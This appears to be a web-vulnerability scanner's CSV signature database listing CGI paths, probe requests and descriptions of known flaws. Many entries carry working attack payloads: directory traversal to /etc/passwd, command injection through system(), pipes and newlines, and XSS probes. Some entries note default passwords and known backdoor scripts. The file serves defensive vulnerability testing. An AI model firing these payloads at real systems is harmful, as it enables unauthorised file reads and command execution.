c,generic,@CGIDIRS,Count.cgi,200,GET,"This may allow attackers to execute arbitrary commands on the server"
c,generic,@CGIDIRS,count.cgi,200,GET,"This might be interesting..."
c,generic,@CGIDIRS,counter-ord,200,GET,"This might be interesting... has been seen in web logs from a scanner."
c,generic,@CGIDIRS,counterbanner,200,GET,"This might be interesting... has been seen in web logs from a scanner."
c,generic,@CGIDIRS,counterbanner-ord,200,GET,"This might be interesting... has been seen in web logs from a scanner."
c,generic,@CGIDIRS,counterfiglet-ord,200,GET,"This might be interesting... has been seen in web logs from a scanner."
c,generic,@CGIDIRS,counterfiglet/nc/,200,GET,"This might be interesting... has been seen in web logs from a scanner."
c,generic,@CGIDIRS,csChatRBox.cgi?command=savesetup&setup=;system('cat%20/etc/passwd'),"root:",GET,"Multiple scripts from CGIscript.net have remote code execution vulnerabilities. Upgrade to the latest version."
c,generic,@CGIDIRS,csGuestBook.cgi?command=savesetup&setup=;system('cat%20/etc/passwd'),"root:",GET,"Multiple scripts from CGIscript.net have remote code execution vulnerabilities. Upgrade to the latest version."
c,generic,@CGIDIRS,csh,200,GET,"Shell found in CGI dir!"
c,generic,@CGIDIRS,csLiveSupport.cgi?command=savesetup&setup=;system('cat%20/etc/passwd'),"root:",GET,"Multiple scripts from CGIscript.net have remote code execution vulnerabilities. Upgrade to the latest version."
c,generic,@CGIDIRS,csNewsPro.cgi?command=savesetup&setup=;system('cat%20/etc/passwd'),"root:",GET,"Multiple scripts from CGIscript.net have remote code execution vulnerabilities. Upgrade to the latest version."
c,generic,@CGIDIRS,csSearch.cgi?command=savesetup&setup=`cat%20/etc/passwd`,"root:",GET,"csSearch (http://www.cgiscript.net/) has a major flaw which allows perl to be executed remotely. Upgrade to a version higher than 2.3. CAN-2002-0495."
c,generic,@CGIDIRS,cstat.pl,200,GET,"This might be interesting..."
c,generic,@CGIDIRS,c_download.cgi,200,GET,"This might be interesting..."
c,generic,@CGIDIRS,dasp/fm_shell.asp,200,GET,"This might be interesting..."
c,generic,@CGIDIRS,day5datacopier.cgi,200,GET,"This might be interesting..."
c,generic,@CGIDIRS,day5datanotifier.cgi,200,GET,"This might be interesting... has been seen in web logs from a scanner."
c,generic,@CGIDIRS,db2www/library/document.d2w/show,200,GET,"This might be interesting... has been seen in web logs from a scanner."
c,generic,@CGIDIRS,dbman/db.cgi?db=no-db,200,GET,"This CGI allows remote attackers to view system information."
c,generic,@CGIDIRS,db_manager.cgi,200,GET,"This might be interesting... has been seen in web logs from a scanner."
c,generic,@CGIDIRS,DCFORMS98.CGI,200,GET,"This might be interesting... has been seen in web logs from a scanner."
c,generic,@CGIDIRS,dcforum.cgi?az=list&forum=../../../../../../../../../../etc/passwd%00,"root:",GET,"This install of DCForum allows attackers to read arbitrary files on the host."
c,generic,@CGIDIRS,dcshop/auth_data/auth_user_file.txt,200,GET,"The DCShop installation allows credit card numbers to be viewed remotely. See dcscripts.com for fix information."
c,generic,@CGIDIRS,DCShop/auth_data/auth_user_file.txt,200,GET,"The DCShop installation allows credit card numbers to be viewed remotely. See dcscripts.com for fix information."
c,generic,@CGIDIRS,dcshop/orders/orders.txt,200,GET,"The DCShop installation allows credit card numbers to be viewed remotely. See dcscripts.com for fix information."
c,generic,@CGIDIRS,DCShop/orders/orders.txt,200,GET,"The DCShop installation allows credit card numbers to be viewed remotely. See dcscripts.com for fix information."
c,generic,@CGIDIRS,dfire.cgi,200,GET,"This might be interesting..."
c,generic,@CGIDIRS,diagnose.cgi,200,GET,"This COWS (CGI Online Worldweb Shopping) script may give system information to attackers, and may be vulnerable to Cross Site Scripting (XSS). CA-2000-02."
c,generic,@CGIDIRS,dig.cgi,200,GET,"This might be interesting..."
c,generic,@CGIDIRS,directorypro.cgi?want=showcat&show=../../../../../../../../../../etc/passwd%00,"root:",GET,"This CGI allows attackers to read arbitrary files on the server."
c,generic,@CGIDIRS,displayTC.pl,200,GET,"This might be interesting..."
c,generic,@CGIDIRS,dnewsweb,200,GET,"This might be interesting... has been seen in web logs from a scanner."
c,generic,@CGIDIRS,donothing,200,GET,"This might be interesting... has been seen in web logs from a scanner."
c,generic,@CGIDIRS,download.cgi,200,GET,"v1 by Matt Wright; check info in Phrack 55 by RFP"
c,generic,@CGIDIRS,dumpenv.pl,200,GET,"This CGI gives a lot of information to attackers."
c,generic,@CGIDIRS,echo.bat,200,GET,"This CGI may allow attackers to execute remote commands."
c,generic,@CGIDIRS,echo.bat?&dir+c:\,200,GET,"This batch file may allow attackers to execute remote commands."
c,generic,@CGIDIRS,edit.pl,200,GET,"This might be interesting..."
c,generic,@CGIDIRS,empower?DB=whateverwhatever,"db name whateverwhatever of directory /",GET,"This CGI allows attackers to learn the full system path to your web directory."
c,generic,@CGIDIRS,emu/html/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00,"root:",GET,"EmuMail allows any file to be retrieved from the remote system."
c,generic,@CGIDIRS,emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00,"root:",GET,"EmuMail allows any file to be retrieved from the remote system."
c,generic,@CGIDIRS,emumail/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00,"root:",GET,"EmuMail allows any file to be retrieved from the remote system."
c,generic,@CGIDIRS,enter.cgi,200,GET,"This might be interesting..."
c,generic,@CGIDIRS,environ.cgi,200,GET,"This might be interesting..."
c,generic,@CGIDIRS,environ.pl,200,GET,"This might be interesting..."
c,generic,@CGIDIRS,eshop.pl/seite=;cat%20eshop.pl|,"\/perl",GET,"This CGI allows attackers to execute commands on the remote server. CAN-2001-1014."
c,generic,@CGIDIRS,ex-logger.pl,200,GET,"This might be interesting..."
c,generic,@CGIDIRS,excite,200,GET,"This might be interesting..."
c,generic,@CGIDIRS,ezadmin.cgi,200,GET,"Some versions of this CGI are vulnerable to a buffer overflow."
c,generic,@CGIDIRS,ezboard.cgi,200,GET,"Some versions of this CGI are vulnerable to a buffer overflow."
c,generic,@CGIDIRS,ezman.cgi,200,GET,"Some versions of this CGI are vulnerable to a buffer overflow."
c,generic,@CGIDIRS,ezshopper/loadpage.cgi?user_id=1&file=|cat%20/etc/passwd|,200,GET,"EZShopper loadpage CGI read arbitrary files"
c,generic,@CGIDIRS,ezshopper/search.cgi?user_id=id&database=dbase1.exm&template=../../../../../../../etc/passwd&distinct=1,200,GET,"EZShopper search CGI read arbitrary files"
c,generic,@CGIDIRS,faqmanager.cgi?toc=/etc/passwd%00,"root:",GET,"FAQmanager allows arbitrary files to be read on the host. Upgrade to latest version: http://www.fourteenminutes.com/code/faqmanager/"
c,generic,@CGIDIRS,faxsurvey?cat%20/etc/passwd,"root:",GET,"This CGI allows attackers to execute commands and read files remotely."
c,generic,@CGIDIRS,filemail,200,GET,"This might be interesting..."
c,generic,@CGIDIRS,filemail.pl,200,GET,"This might be interesting..."
c,generic,@CGIDIRS,FileSeek.cgi?head=&foot=....//....//....//....//....//....//....//etc/passwd,"root:",GET,"FileSeek allows arbitrary files to be retrieved. Update to the latest version from cgi-perl.com" 
c,generic,@CGIDIRS,FileSeek.cgi?head=&foot=;cat%20/etc/passwd,"root:",GET,"FileSeek allows arbitrary command execution. Update to the latest version from cgi-perl.com" 
c,generic,@CGIDIRS,FileSeek.cgi?head=....//....//....//....//....//....//....//etc/passwd&foot=,"root:",GET,"FileSeek allows arbitrary files to be retrieved. Update to the latest version from cgi-perl.com" 
c,generic,@CGIDIRS,FileSeek.cgi?head=;cat%20/etc/passwd|&foot=,"root:",GET,"FileSeek allows arbitrary command execution. Update to the latest version from cgi-perl.com" 
c,generic,@CGIDIRS,FileSeek2.cgi?head=&foot=....//....//....//....//....//....//....//etc/passwd,"root:",GET,"FileSeek allows arbitrary files to be retrieved. Update to the latest version from cgi-perl.com" 
c,generic,@CGIDIRS,FileSeek2.cgi?head=&foot=;cat%20/etc/passwd,"root:",GET,"FileSeek allows arbitrary command execution. Update to the latest version from cgi-perl.com" 
c,generic,@CGIDIRS,FileSeek2.cgi?head=....//....//....//....//....//....//....//etc/passwd&foot=,"root:",GET,"FileSeek allows arbitrary files to be retrieved. Update to the latest version from cgi-perl.com" 
c,generic,@CGIDIRS,FileSeek2.cgi?head=;cat%20/etc/passwd|&foot=,"root:",GET,"FileSeek allows arbitrary command execution. Update to the latest version from cgi-perl.com" 
c,generic,@CGIDIRS,finger,200,GET,"finger other users, may be other commands?"
c,generic,@CGIDIRS,finger.cgi,200,GET,"finger other users, may be other commands?"
c,generic,@CGIDIRS,finger.pl,200,GET,"finger other users, may be other commands?"
c,generic,@CGIDIRS,flexform,200,GET,"Check Phrack 55 for info by RFP, allows to append info to writable files."
c,generic,@CGIDIRS,flexform.cgi,200,GET,"Check Phrack 55 for info by RFP, allows to append info to writable files."
c,generic,@CGIDIRS,fom.cgi?file=<script>alert('Vulnerable')</script>,"<script>alert('Vulnerable')</script>",GET,"Faq-O-Matic is vulnerable to Cross Site Scripting (XSS).  Upgrade to the latest from http://sourceforge.net/projects/faqomatic. CA-2000-02."
c,generic,@CGIDIRS,fom/fom.cgi?cmd=<script>alert('Vulnerable')</script>&file=1&keywords=vulnerable,"<script>alert('Vulnerable')</script>",GET,"Faq-O-Matic is vulnerable to cross site scripting (XSS) CA-2000-02. Check for updates here http://faqomatic.sourceforge.net/fom-serve/cache/1.html"
c,generic,@CGIDIRS,formmail,"Version ",GET,"The remote CGI reveals its version number, which may aid attackers in finding vulnerabilities in the script."
c,generic,@CGIDIRS,formmail.cgi,"Version ",GET,"The remote CGI reveals its version number, which may aid attackers in finding vulnerabilities in the script."
c,generic,@CGIDIRS,formmail.cgi?recipient=root@localhost%0Acat%20/etc/passwd&email=joeuser@localhost&subject=test,"root:",GET,"This CGI allows attackers to retrieve arbitrary files from the server."
c,generic,@CGIDIRS,formmail.pl,"Version ",GET,"The remote CGI reveals its version number, which may aid attackers in finding vulnerabilities in the script."
c,generic,@CGIDIRS,formmail.pl,200,GET,"Many versions of FormMail have remote vulnerabilities, including file access, information disclosure and email abuse. FormMail access should be restricted as much as possible or a more secure solution found."
c,generic,@CGIDIRS,formmail.pl?recipient=root@localhost%0Acat%20/etc/passwd&email=joeuser@localhost&subject=test,"root:",GET,"This CGI allows attackers to retrieve arbitrary files from the server."
c,generic,@CGIDIRS,formmail?recipient=root@localhost%0Acat%20/etc/passwd&email=joeuser@localhost&subject=test,"root:",GET,"This CGI allows attackers to retrieve arbitrary files from the server."
c,generic,@CGIDIRS,ftp.pl,200,GET,"This might be interesting... is file transfer allowed?"
c,generic,@CGIDIRS,gbook/gbook.cgi,200,GET,"This might be interesting... has been seen in web logs from a scanner."
c,generic,@CGIDIRS,generate.cgi?content=../../../../../../../../../../etc/passwd%00board=board_1,"root:",GET,"This CGI from SIX webboard allows attackers read arbitrary files on the host."
c,generic,@CGIDIRS,generate.cgi?content=../../../../../../../../../../windows/win.ini%00board=board_1,"[windows]",GET,"This CGI from SIX webboard allows attackers read arbitrary files on the host."
c,generic,@CGIDIRS,generate.cgi?content=../../../../../../../../../../winnt/win.ini%00board=board_1,"[fonts]",GET,"This CGI from SIX webboard allows attackers read arbitrary files on the host."
c,generic,@CGIDIRS,get32.exe,200,GET,"This can allow attackers to execute arbitrary commands remotely."
c,generic,@CGIDIRS,getdoc.cgi,200,GET,"This might be interesting..."
c,generic,@CGIDIRS,gettransbitmap,200,GET,"Sun Answerbook2 is vulnerable to a buffer overflow in the gettransbitmap CGI. All default CGIs should be disabled or removed, and Answerbook2 should be disabled if not being used."
c,generic,@CGIDIRS,gH.cgi,200,GET,"web backdoor by gH"
c,generic,@CGIDIRS,glimpse,200,GET,"This might be interesting..."
c,generic,@CGIDIRS,gm-authors.cgi,200,GET,"GreyMatter 'password' file, that controls who can post. This contains login and password information and is installed mode 666 by default. See http://www.attrition.org/~jericho/works/security/greymatter.html for more info."
c,generic,@CGIDIRS,gm-cplog.cgi,200,GET,"GreyMatter log file defaults to mode 666 and contains login and passwords used to update the GM site. See http://www.attrition.org/~jericho/works/security/greymatter.html for more info."
c,generic,@CGIDIRS,gm.cgi,200,GET,"GreyMatter blogger may reveal user ids/passwords through a gmrightclick-######.reg files (# are numbers), possibly in /archive or other archive location. See http://www.attrition.org/~jericho/works/security/greymatter.html for more info."
c,generic,@CGIDIRS,guestbook.cgi,200,GET,"May allow attackers to execute commands as the web daemon."
c,generic,@CGIDIRS,guestbook.pl,200,GET,"May allow attackers to execute commands as the web daemon."
c,generic,@CGIDIRS,handler.cgi,200,GET,"Variation of Irix Handler? Has been seen from other CGI scanners."
c,generic,@CGIDIRS,hitview.cgi,200,GET,"This might be interesting..."
c,generic,@CGIDIRS,hsx.cgi?show=../../../../../../../../../../../etc/passwd%00,"root:",GET,"This CGI contains a well known vul that allows attackers to read any system file."
c,generic,@CGIDIRS,htgrep?file=index.html&hdr=/etc/passwd,"root:",GET,"This CGI contains a well known vul that allows attackers to read any system file."
c,generic,@CGIDIRS,htimage.exe,200,GET,"This CGI can give an attacker a lot of information."
c,generic,@CGIDIRS,htmlscript?../../../../../../../../../../etc/passwd,"root:",GET,"This CGI contains a well known vul that allows attackers to read any system file."
c,generic,@CGIDIRS,htsearch.cgi?words=%22%3E%3Cscript%3Ealert%'Vulnerable'%29%3B%3C%2Fscript%3E,"<script>alert('Vulnerable')</script>",GET,"htdig is vulnerable to Cross Site Scripting (XSS). CA-2000-02."
c,generic,@CGIDIRS,htsearch?-c/nonexistant,"Unable to read configuration file '/nonexistant'",GET,"The ht::/Dig install may let an attacker force ht://Dig to read arbitrary config files for itself."
c,generic,@CGIDIRS,htsearch?config=foofighter&restrict=&exclude=&method=and&format=builtin-long&sort=score&words=,"ht:\/\/Dig",GET,"The ht://Dig install may reveal the path to its configuration files, revealing sensitive information about the server."
c,generic,@CGIDIRS,htsearch?exclude=%60/etc/passwd%60,"root:",GET,"This CGI contains a well known vul that allows attackers to read any system file."
c,generic,@CGIDIRS,ibill.pm,200,GET,"iBill.pm is installed. This may allow brute forcing of passwords."
c,generic,@CGIDIRS,icat,200,GET,"Multiple versions of icat allow attackers to read arbitrary files. Make sure the latest version is running."
c,generic,@CGIDIRS,ikonboard/help.cgi?,200,GET,"This might be interesting... has been seen in web logs from a scanner."
c,generic,@CGIDIRS,imagemap,200,GET,"Possible variation: imagemap.exe installed could contain a buffer overflow. CVE-1999-0951. BID-739."
c,generic,@CGIDIRS,imagemap.exe,200,GET,"The version of imagemap.exe installed could contain a buffer overflow. CVE-1999-0951. BID-739."
c,generic,@CGIDIRS,inc/sendmail.inc,"This program is free software",GET,"Basilix allows its configuration files to be downloaded, which  may include the mysql auth credentials."
c,generic,@CGIDIRS,info2www,200,GET,"This CGI allows attackers to execute commands."
c,generic,@CGIDIRS,infosrch.cgi,200,GET,"This CGI allows attackers to execute commands."
c,generic,@CGIDIRS,jj,200,GET,"This might be interesting..."
c,generic,@CGIDIRS,journal.cgi?folder=journal.cgi%00,200,GET,"This might be interesting... has been seen in web logs from a scanner."
c,generic,@CGIDIRS,ksh,200,GET,"Shell found in CGI dir!"
c,generic,@CGIDIRS,lastlines.cgi?process,"root:","POST","This CGI lets attackers read arbitrary files and/or execte commands.","num_lines=1000&log_location=..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"
c,generic,@CGIDIRS,listrec.pl,200,GET,"This CGI allows attackers to execute commands on the host."
c,generic,@CGIDIRS,loadpage.cgi?user_id=1&file=../../../../../../../../../../etc/passwd,"root:",GET,"This CGI allows attackers to read arbitrary files on the host."
c,generic,@CGIDIRS,loadpage.cgi?user_id=1&file=..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini,"[windows]",GET,"This CGI allows attackers to read arbitrary files on the host."
c,generic,@CGIDIRS,log-reader.cgi,200,GET,"This might be interesting..."
c,generic,@CGIDIRS,log/,200,GET,"This might be interesting..."
c,generic,@CGIDIRS,log/nether-log.pl?checkit,200,GET,"Default Pass: nethernet-rules"
c,generic,@CGIDIRS,login.cgi,200,GET,"This might be interesting..."
c,generic,@CGIDIRS,login.pl,200,GET,"This might be interesting..."
c,generic,@CGIDIRS,logit.cgi,200,GET,"This might be interesting..."
c,generic,@CGIDIRS,logs.pl,200,GET,"May be interesting..."
c,generic,@CGIDIRS,logs/,200,GET,"This might be interesting..."
c,generic,@CGIDIRS,logs/access_log,200,GET,"Just found this log..."
c,generic,@CGIDIRS,lookwho.cgi,200,GET,"This might be interesting..."
c,generic,@CGIDIRS,LWGate,200,GET,"Check Phrack 55 for info by RFP"
c,generic,@CGIDIRS,lwgate,200,GET,"Check Phrack 55 for info by RFP"
c,generic,@CGIDIRS,LWGate.cgi,200,GET,"Check Phrack 55 for info by RFP, http://www.phrack.com/show.php?p=55&a=7"
c,generic,@CGIDIRS,lwgate.cgi,200,GET,"Check Phrack 55 for info by RFP, http://www.phrack.com/show.php?p=55&a=7"
c,generic,@CGIDIRS,mail/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00,"root:",GET,"EmuMail allows any file to be retrieved from the remote system."
c,generic,@CGIDIRS,mailit.pl,200,GET,"Sambar may allow anonymous email to be sent from any host via this CGI."
c,generic,@CGIDIRS,maillist.cgi,200,GET,"This might be interesting..."
c,generic,@CGIDIRS,maillist.pl,200,GET,"This might be interesting..."
c,generic,@CGIDIRS,mailnews.cgi,200,GET,"some versions allow attacker to execute commands as http daemon. Upgrade or remove."
c,generic,@CGIDIRS,main.cgi?board=FREE_BOARD&command=down_load&filename=../../../../../../../../../../etc/passwd,"root:",GET,"This CGI allows attackers to read arbitrary files remotely."
c,generic,@CGIDIRS,majordomo.pl,200,GET,"This might be interesting... has been seen in web logs from a scanner."
c,generic,@CGIDIRS,man.sh,200,GET,"This might be interesting..."
c,generic,@CGIDIRS,meta.pl,200,GET,"This might be interesting..."
c,generic,@CGIDIRS,mgrqcgi,200,GET,"This CGI from Magic Enterprise 8.30-5 and earlier are vulnerable to multiple buffer overflows. Upgrade to 9.x."
c,generic,@CGIDIRS,minimal.exe,200,GET,"This might be interesting..."
c,generic,@CGIDIRS,mini_logger.cgi,200,GET,"Default password: guest"
c,generic,@CGIDIRS,mkilog.exe,200,GET,"This CGI can give an attacker a lot of information."
c,generic,@CGIDIRS,mkplog.exe,200,GET,"This CGI can give an attacker a lot of information."
c,generic,@CGIDIRS,mmstdod.cgi,200,GET,"May allow attacker to execute remote commands. Upgrade to version 3.0.26 or higher."
c,generic,@CGIDIRS,mrtg.cfg?cfg=../../../../../../../../etc/passwd,"root:",GET,"Multi Router Traffic Grapher (mrtg.org) is vulnerable to a 'show files' vulnerability. Software should be upgraded to the latest version."
c,generic,@CGIDIRS,mrtg.cgi?cfg=../../../../../../../../etc/passwd,"root:",GET,"Multi Router Traffic Grapher (mrtg.org) is vulnerable to a 'show files' vulnerability. Software should be upgraded to the latest version."
c,generic,@CGIDIRS,mrtg.cgi?cfg=blah,"Cannot find the given config file",GET,"Multi Router Traffic Grapher (mrtg.org) reveals system paths when an invalid config file is specified. Software should be upgraded to the latest version."
c,generic,@CGIDIRS,multihtml.pl?multi=/etc/passwd%00html,"root:",GET,"This CGI allows attackers to read arbitrary files on the host."
c,generic,@CGIDIRS,myguestbook.cgi?action=view,200,GET,"myGuestBook 1.0 may be vulnerable to Cross Site Scripting (XSS) in posted contents. Upgrade to the latest version from http://www.levcgi.com/.  CA-2000-02."
c,generic,@CGIDIRS,ncommerce3/ExecMacro/macro.d2w/%0a%0a,200,GET,"This might be interesting... has been seen in web logs from a scanner."
c,generic,@CGIDIRS,ncommerce3/ExecMacro/macro.d2w/NOEXISTINGHTMLBLOCK,200,GET,"This might be interesting... has been seen in web logs from a scanner."
c,generic,@CGIDIRS,netauth.cgi?cmd=show&page=../../../../../../../../../../etc/passwd,"root:",GET,"This CGI allows attackers to view arbitrary files on the server."
c,generic,@CGIDIRS,netpad.cgi,200,GET,"netpad.cgi may be an indication of a malicious user on the system, as it allows web access to the file system. It may also have remote vulnerabilities itself. This should be removed or protected."
c,generic,@CGIDIRS,newsdesk.cgi?t=../../../../../../../../../../etc/passwd,"root:",GET,"This CGI allows attackers to view arbitrary files on the server."
c,generic,@CGIDIRS,nlog-smb.cgi,200,GET,"This might be interesting..."
c,generic,@CGIDIRS,nlog-smb.pl,200,GET,"This might be interesting..."
c,generic,@CGIDIRS,nph-emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00,"root:",GET,"EmuMail allows any file to be retrieved from the remote system."
c,generic,@CGIDIRS,nph-maillist.pl,200,GET,"This might be interesting... has been seen in web logs from a scanner."
c,generic,@CGIDIRS,nph-publish,200,GET,"This might be interesting..."
c,generic,@CGIDIRS,nph-publish.cgi,200,GET,"This CGI may allow attackers to execute arbitrary commands on the server."
c,generic,@CGIDIRS,nph-test-cgi,200,GET,"This CGI lets attackers get a directory listing of the CGI directory."
c,generic,@CGIDIRS,ntitar.pl,200,GET,"This might be interesting..."
c,generic,@CGIDIRS,opendir.php?/etc/passwd,"root:",GET,"This CGI allows attackers to read any file on the web server."
c,generic,@CGIDIRS,orders/orders.txt,200,GET,"The DCShop installation allows credit card numbers to be viewed remotely. See dcscripts.com for fix information."
c,generic,@CGIDIRS,pagelog.cgi,200,GET,"Some versions of this allow you to create system files. Request 'pagelog.cgi?name=../../../../.././tmp/filename' to try."
c,generic,@CGIDIRS,pals-cgi?palsAction=restart&documentName=/etc/passwd,"root:",GET,"This CGI allows remote users to read system files."
c,generic,@CGIDIRS,pass,200,GET,"This could be interesting..."
c,generic,@CGIDIRS,passwd,200,GET,"This could be interesting..."
c,generic,@CGIDIRS,passwd.txt,200,GET,"This could be interesting..."
c,generic,@CGIDIRS,password,200,GET,"This could be interesting..."
c,generic,@CGIDIRS,pbcgi.cgi?name=Joe%Camel&email=%3CSCRIPT%3Ealert%28%27Vulnerable%27%29%3B%3C%2FSCRIPT%3E,"<script>alert('Vulnerable')</script>",GET,"Lil'HTTP Server (Summit Computer Networks) CGI is vulnerable to Cross Site Scripting (XSS). CA-2000-02."
c,generic,@CGIDIRS,Pbcgi.exe,200,GET,"Sambar may be vulnerable to a DOS when a long string is passed to Pbcgi.exe (not attempted). Default CGI should be removed from web servers."
c,generic,@CGIDIRS,perl,200,GET,"Shell/interpreter found"
c,generic,@CGIDIRS,perl.exe,200,GET,"Can run PERL code"
c,generic,@CGIDIRS,perl.exe?-v,200,GET,"perl is installed in the CGI directory. This essentially gives attackers a system shell. Remove perl.exe from the CGI dir."
c,generic,@CGIDIRS,perl?-v,200,GET,"perl is installed in the CGI directory. This essentially gives attackers a system shell. Remove perl from the CGI dir."
c,generic,@CGIDIRS,perlshop.cgi,200,GET,"v3.1 by ARPAnet.com; check info in Phrack 55 by RFP"
c,generic,@CGIDIRS,pfdispaly.cgi?'%0A/bin/cat%20/etc/passwd|',"root:",GET,"This allows attackers to execute arbitrary commands on the host."
c,generic,@CGIDIRS,pfdispaly.cgi?../../../../../../../../../../etc/passwd,"root:",GET,"This allows attackers to read arbitrary files on the host."
c,generic,@CGIDIRS,pfdisplay.cgi?'%0A/bin/cat%20/etc/passwd|',"root:",GET,"This allows attackers to execute arbitrary commands on the host."
c,generic,@CGIDIRS,phf,200,GET,"Old and vulnerable? Or is someone messing with us...?"
c,generic,@CGIDIRS,phf.cgi?QALIAS=x%0a/bin/cat%20/etc/passwd,"root:",GET,"C'mon, this is REALLY old... upgrade out for years"
c,generic,@CGIDIRS,phf?Qname=root%0Acat%20/etc/passwd%20,"root:",GET,"This allows attackers to read arbitrary files on the system and perhaps execute commands."
c,generic,@CGIDIRS,php-cgi,200,GET,"This might be interesting... has been seen in web logs from a scanner."
c,generic,@CGIDIRS,php.cgi?/etc/passwd,"root:",GET,"This allows attackers to read arbitrary files on the system and perhaps execute commands."
c,generic,@CGIDIRS,plusmail,200,GET,"This CGI may allow attackers to execute commands remotely."
c,generic,@CGIDIRS,pollit/Poll_It_SSI_v2.0.cgi?data_dir=\etc\passwd%00,"root:",GET,"This CGI allows attackers to retrieve arbitrary files."
c,generic,@CGIDIRS,pollssi.cgi,200,GET,"This might be interesting... has been seen in web logs from a scanner."
c,generic,@CGIDIRS,postcards.cgi,200,GET,"This might be interesting... has been seen in web logs from a scanner."
c,generic,@CGIDIRS,post_query,200,GET,"This might be interesting..."
c,generic,@CGIDIRS,powerup/r.cgi?FILE=../../../../../../../../../../etc/passwd,"root:",GET,"The Powerup CGI allows attackers to read any file on the system."
c,generic,@CGIDIRS,ppdscgi.exe,200,GET,"PowerPlay Web Edition may allow unauthenticated users to view pages."
c,generic,@CGIDIRS,processit.pl,200,GET,"This CGI returns environment variables, giving attackers valuable information."
c,generic,@CGIDIRS,profile.cgi,200,GET,"This might be interesting... has been seen in web logs from a scanner."
c,generic,@CGIDIRS,pu3.pl,200,GET,"This might be interesting..."
c,generic,@CGIDIRS,publisher/search.cgi?dir=jobs&template=;cat%20/etc/passwd|&output_number=10,"root:",GET,"AHG's search.cgi allows any command to be executed. www.ahg.com."
c,generic,@CGIDIRS,query?mss=%2e%2e/config,"MGMT_PW",GET,"The Altavista search service allows attackers to read any file on the server."
c,generic,@CGIDIRS,quickstore.cgi?page=../../../../../../../../../../etc/passwd%00html&cart_id=,"root:",GET,"This CGI allows attackers to read arbitrary files on the remote system."
c,generic,@CGIDIRS,quizme.cgi,200,GET,"Mike's Quiz Me! CGI contained a bug which allowed arbitrary command exectution (version 0.5), see http://freshmeat.net/users/mikespice/"
c,generic,@CGIDIRS,r.cgi?FILE=../../../../../../../../../../etc/passwd,"root:",GET,"The Powerup CGI allows attackers to read any file on the system."
c,generic,@CGIDIRS,ratlog.cgi,200,GET,"This might be interesting..."
c,generic,@CGIDIRS,replicator/webpage.cgi/,200,GET,"This might be interesting... has been seen in web logs from a scanner."
c,generic,@CGIDIRS,responder.cgi,200,GET,"This might be interesting..."
c,generic,@CGIDIRS,retrieve_password.pl,200,GET,"May not be vulnerable, but see http://www.dcscripts.com/bugtrac/DCForumID7/3.html for information."
c,generic,@CGIDIRS,rguest.exe,200,GET,"This might be interesting..."
c,generic,@CGIDIRS,rksh,200,GET,"Shell found in CGI dir!"
c,generic,@CGIDIRS,rmp_query,200,GET,"This might be interesting... has been seen in web logs from a scanner."
c,generic,@CGIDIRS,robadmin.cgi,200,GET,"Default password: roblog"
c,generic,@CGIDIRS,robpoll.cgi,200,GET,"This might be interesting... has been seen in web logs from a scanner."
c,generic,@CGIDIRS,rpm_query,200,GET,"This CGI allows anyone to see the installed RPMs"
c,generic,@CGIDIRS,rsh,200,GET,"Shell found"
c,generic,@CGIDIRS,rtm.log,"HttpPost Retry",GET,"Rich Media's JustAddCommerce allows retrieval of a log file, which may contain sensitive information."
c,generic,@CGIDIRS,rwcgi60,200,GET,"Oracle report server reveals system information without authorization. See See Oracle note 133957.1 - Restricting Access to the Reports Server Environment and Output"
c,generic,@CGIDIRS,rwcgi60/showenv,200,GET,"Oracle report server reveals system information without authorization. See See Oracle note 133957.1 - Restricting Access to the Reports Server Environment and Output"
c,generic,@CGIDIRS,rwwwshell.pl,200,GET,"THC reverse www shell"
c,generic,@CGIDIRS,scoadminreg.cgi,200,GET,"This script (part of UnixWare WebTop) may have a local root exploit. It is also an system admin script and should be protected via the web."
c,generic,@CGIDIRS,search.cgi,200,GET,"This might be interesting..."
c,generic,@CGIDIRS,search.cgi?..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini,"[windows]",GET,"This CGI contains a well known vul that allows attackers to read any system file."
c,generic,@CGIDIRS,search.cgi?..\\..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini,"[fonts]",GET,"This CGI contains a well known vul that allows attackers to read any system file."
c,generic,@CGIDIRS,search.pl,200,GET,"This might be interesting..."
c,generic,@CGIDIRS,search.pl?form=../../../../../../../../../../etc/passwd%00,"root:",GET,"The ROADS search.pl allows attackers to retrieve system files."
c,generic,@CGIDIRS,search.pl?Realm=All&Match=0&Terms=test&nocpp=1&maxhits=10&;Rank=<script>alert('Vulnerable')</script>,"<script>alert('Vulnerable')</script>",GET,"Fluid Dynamics FD Search engine from http://www.xav.com/ is vulnerable to Cross Site Scripting (XSS). CA-2000-02. Upgrade to FDSE version 2.0.0.0055"
c,generic,@CGIDIRS,search/search.cgi?keys=*&prc=any&catigory=../../../../../../../../../../../../etc,"resolv.conf",GET,"It is possible to read files on the remote server, this CGI should be removed."
c,generic,@CGIDIRS,sendform.cgi,200,GET,"This CGI by Rod Clark (v1.4.4 and below) may allow arbitrary file reading via email or allow spam to be sent. CAN-2002-0710. BID-5286."
c,generic,@CGIDIRS,sendpage.pl,200,GET,"Passes unparsed form input to command line"
c,generic,@CGIDIRS,sendtemp.pl?templ=../../../../../../../../../../etc/passwd,"root:",GET,"This CGI contains a well known vul that allows attackers to read any system file."
c,generic,@CGIDIRS,session/adminlogin,200,GET,"This might be interesting..."
c,generic,@CGIDIRS,sewse?/home/httpd/html/sewse/jabber/comment2.jse+/etc/passwd,"root:",GET,"Default scripts can allow arbitrary access to the host."
c,generic,@CGIDIRS,sh,200,GET,"Shell found in CGI dir!"
c,generic,@CGIDIRS,shop.cgi?page=../../../../../../../etc/passwd,"root:",GET,"Remote file read retrieval."
c,generic,@CGIDIRS,shop/auth_data/auth_user_file.txt,200,GET,"The DCShop installation allows credit card numbers to be viewed remotely. See dcscripts.com for fix information."
c,generic,@CGIDIRS,shop/orders/orders.txt,200,GET,"The DCShop installation allows credit card numbers to be viewed remotely. See dcscripts.com for fix information."
c,generic,@CGIDIRS,shopper.cgi?newpage=../../../../../../../../../../etc/passwd,"root:",GET,"Versions 1 and 2 of Byte's Interactive Web Shoper allow attackers to read files remotely. Uncomment the #$debug=1 variable."
